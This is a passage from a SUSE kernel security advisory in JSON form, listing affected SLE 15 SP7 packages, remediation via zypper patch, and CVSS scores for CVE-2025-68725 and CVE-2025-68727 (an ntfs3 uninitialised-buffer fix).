"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
